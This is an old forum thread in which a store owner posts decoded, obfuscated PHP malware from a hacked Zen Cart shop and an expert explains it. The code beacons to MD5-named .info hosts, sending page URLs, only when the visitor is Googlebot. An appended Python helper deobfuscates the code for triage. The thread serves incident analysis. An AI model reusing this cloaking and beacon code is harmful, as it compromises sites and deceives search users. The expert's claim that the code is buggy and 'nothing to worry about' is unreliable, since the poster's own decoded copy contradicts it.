zen cart store php hacked, need help analyzing code

Posted on 2009-12-17
Last Modified: 2012-05-08
Hello, I'm helping a client with a hacked store. I found an eval(base64_decode(...)) call, so I decoded it myself and came up with the resulting code. We discovered the code when Google's cache indicated that it was presenting unsavory links ONLY to the Google search indexer and not to normal browsers. I need help analyzing it to understand what else it does and what else needs to be cleaned.

Any help would be greatly appreciated!
//below is the base64 decoded string

$_439ec1cb0f1656c6617f41d88cf94830 = chr(115).chr(117).chr(98).chr(115).chr(116).chr(114);
$_2938297da3b9a834030705b3aa59d93a = chr(109).chr(100).chr(53);
$_ba30428b6c049208a76657c6480b7ddf = chr(102).chr(115).chr(111).chr(99).chr(107).chr(111).chr(112).chr(101).chr(110);
$_ecaa7596b439b9af60cc983b2067fabc = chr(102).chr(112).chr(117).chr(116).chr(115);
$_91588db553ad4b8cc624d1cf6fadf368 = chr(102).chr(103).chr(101).chr(116).chr(115);
$_1d342bc8a8990aae1ed29b52fd51338c = chr(115).chr(116).chr(114).chr(115).chr(116).chr(114);
$_a320eb60651b291ca479f43a8856b73a = chr(95).chr(83).chr(69).chr(82).chr(86).chr(69).chr(82);
$_5a672364743eba1bc07363e4bfced05c = $$_a320eb60651b291ca479f43a8856b73a;

if($_1d342bc8a8990aae1ed29b52fd51338c($_5a672364743eba1bc07363e4bfced05c[chr(72).chr(84).chr(84).chr(80).chr(95).chr(85).chr(83).chr(69).chr(82).chr(95).chr(65).chr(71).chr(69).chr(78).chr(84)], chr(71).chr(111).chr(111).chr(103).chr(108).chr(101).chr(98).chr(111).chr(116))) {
 for($_a2efef6c3e0c659266a3612f08e0f219=458567;$_a2efef6c3e0c659266a3612f08e0f219<458575;$_a2efef6c3e0c659266a3612f08e0f219++) {
  $_37aa5f149a6572e7fb03eb18e150c6dc = $_439ec1cb0f1656c6617f41d88cf94830($_2938297da3b9a834030705b3aa59d93a($_a2efef6c3e0c659266a3612f08e0f219), 0, 16) . chr(46).chr(105).chr(110).chr(102).chr(111);
  $_002a8c508b8e2392e60bb9ffeece46c0=$_ba30428b6c049208a76657c6480b7ddf($_37aa5f149a6572e7fb03eb18e150c6dc, chr(56).chr(48));
  $_ecaa7596b439b9af60cc983b2067fabc($_002a8c508b8e2392e60bb9ffeece46c0, chr(71).chr(69).chr(84).chr(32).chr(47).chr(57).chr(100).chr(100).chr(100).chr(102).chr(50).chr(97).chr(52).chr(102).chr(55).chr(100).chr(57).chr(52).chr(53).chr(57).chr(52).chr(101).chr(99).chr(50).chr(101).chr(97).chr(57).chr(56).chr(52).chr(48).chr(55).chr(97).chr(52).chr(49).chr(48).chr(101).chr(49).chr(32).chr(72).chr(84).chr(84).chr(80).chr(47).chr(49).chr(46).chr(49)."\r\n".chr(72).chr(111).chr(115).chr(116).chr(58).chr(32).$_37aa5f149a6572e7fb03eb18e150c6dc."\r\n".chr(82).chr(101).chr(102).chr(101).chr(114).chr(101).chr(114).chr(58).chr(32).chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).chr(47) . $_5a672364743eba1bc07363e4bfced05c[chr(83).chr(69).chr(82).chr(86).chr(69).chr(82).chr(95).chr(78).chr(65).chr(77).chr(69)] . $$_a320eb60651b291ca479f43a8856b73a[chr(82).chr(69).chr(81).chr(85).chr(69).chr(83).chr(84).chr(95).chr(85).chr(82).chr(73)]."\r\n\r\n");
  while($_f41b8a7eec9e13339d27d6f86193bdc4 = $_91588db553ad4b8cc624d1cf6fadf368($_002a8c508b8e2392e60bb9ffeece46c0, 1024)) {
   if($_fc5c9462e5e78a93bde7df3182d2f1ee) {
   if($_1d342bc8a8990aae1ed29b52fd51338c($_f41b8a7eec9e13339d27d6f86193bdc4,chr(45).chr(45).chr(45).chr(45).chr(45))) {

Question by: MeridianManagement

Accepted Solution

Here is the decoded PHP code:

When it finds that the user agent is Googlebot, it tries to connect to a lot of MD5ed hosts with a .info extension; if it connects successfully, it sends the URL, Referrer, etc. to that server.

Funny one! It has a lot of bugs, like when it sends the HTTP/1.1 request it doesn't put \r\n

Nothing to worry about...
if(strstr($_SERVER['HTTP_USER_AGENT'], 'Googlebot')) {
 for($i=458567;$i<458575;$i++) {
  $var1 = substr(md5($i), 0, 16).".info";
  $sock=fsockopen($var1, 80);
  fputs($sock, "GET /9dddf2a4f7d94594ec2ea98407a410e1 HTTP/1.1 Host: ".$var1."\r\n"."Referer: http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']."\r\n\r\n");
  while($recv = fgets($sock, 1024)) {
   if($var2) {
   if(strstr($recv,'-----')) {

Author Comment

Thanks for the analysis.

The line that shows /9dddf2a4f7d94594ec2ea98407a410e1: is that referring to another file on the server?

You're saying it's trying a lot of MD5 hosts, but where is it getting the addresses for these hosts? I'm not sure I understand how you can connect to a host whose address is encrypted with MD5.

Do you think there are other areas I need to clean, or does this appear to be contained?
Expert Comment

Look, calculate the MD5 of a number, like 4558, and assume it's a9438938a889a839 etc. This code tries to connect to that string plus .info, on port 80.

That /9dddf2a4f7d94594ec2ea98407a410e1 is on the hacker's site; yes, that file is on that server. As I said, nothing to worry about, it's buggy, non-working code.
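A triage helper for the two explanations above (the chr() obfuscation and the "MD5 of a counter plus .info" hostnames), added here as an example; it is not the poster's code, not the expert's, and not part of Zen Cart. It collapses the chr() runs into readable literals, swaps the hash-named function aliases for the real function names, and lists the hostnames the counter loop would derive, so the store's DNS and outbound-connection logs can be searched for past contact. The SAMPLE lines are copied from the question; the function names are my own.

```python
import hashlib
import re

# Constructed sample: four lines copied from the obfuscated dropper in the question.
SAMPLE = """$_1d342bc8a8990aae1ed29b52fd51338c = chr(115).chr(116).chr(114).chr(115).chr(116).chr(114);
$_a320eb60651b291ca479f43a8856b73a = chr(95).chr(83).chr(69).chr(82).chr(86).chr(69).chr(82);
$_5a672364743eba1bc07363e4bfced05c = $$_a320eb60651b291ca479f43a8856b73a;
if($_1d342bc8a8990aae1ed29b52fd51338c($_5a672364743eba1bc07363e4bfced05c[chr(72).chr(84).chr(84).chr(80).chr(95).chr(85).chr(83).chr(69).chr(82).chr(95).chr(65).chr(71).chr(69).chr(78).chr(84)], chr(71).chr(111).chr(111).chr(103).chr(108).chr(101).chr(98).chr(111).chr(116))) {"""

CHR_RUN = re.compile(r"(?:chr\(\d+\)\s*\.\s*)*chr\(\d+\)")
HASH_VAR = r"\$_[0-9a-f]{32}"   # the dropper's md5-style variable names

def decode_chr_runs(src: str) -> str:
    """Collapse every chr(n).chr(n)... run into a single-quoted PHP string literal."""
    def to_literal(match):
        text = "".join(chr(int(n)) for n in re.findall(r"chr\((\d+)\)", match.group(0)))
        return "'" + text.replace("\\", "\\\\").replace("'", "\\'") + "'"
    return CHR_RUN.sub(to_literal, src)

def resolve_aliases(src: str) -> str:
    """Swap hash-named variables that only hold a function name (or another
    variable's name) for what they stand for, so the calls read as plain PHP."""
    for name, value in re.findall(r"(" + HASH_VAR + r")\s*=\s*'([^']*)';", src):
        src = src.replace("$" + name, "$" + value)   # $$_hash  -> $_SERVER
        src = src.replace(name + "(", value + "(")   # $_hash(  -> strstr(
    for name, value in re.findall(r"(" + HASH_VAR + r")\s*=\s*(\$[A-Za-z_]\w*);", src):
        src = src.replace(name, value)               # $_hash['k'] -> $_SERVER['k']
    return src

def deobfuscate(src: str) -> str:
    return resolve_aliases(decode_chr_runs(src))

def beacon_hosts(start: int = 458567, stop: int = 458575) -> list:
    """Hostnames the decoded for-loop derives: first 16 hex chars of md5(counter) + '.info'.
    Meant for searching the store's DNS/outbound logs for past contact."""
    return [hashlib.md5(str(i).encode()).hexdigest()[:16] + ".info" for i in range(start, stop)]

if __name__ == "__main__":
    print(deobfuscate(SAMPLE))
    print("\n".join(beacon_hosts()))
```

Any hit on one of those hostnames in the web server's outbound logs dates the infection; the same two passes applied to the rest of the dropper make the while/if tail readable once the full file is recovered.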
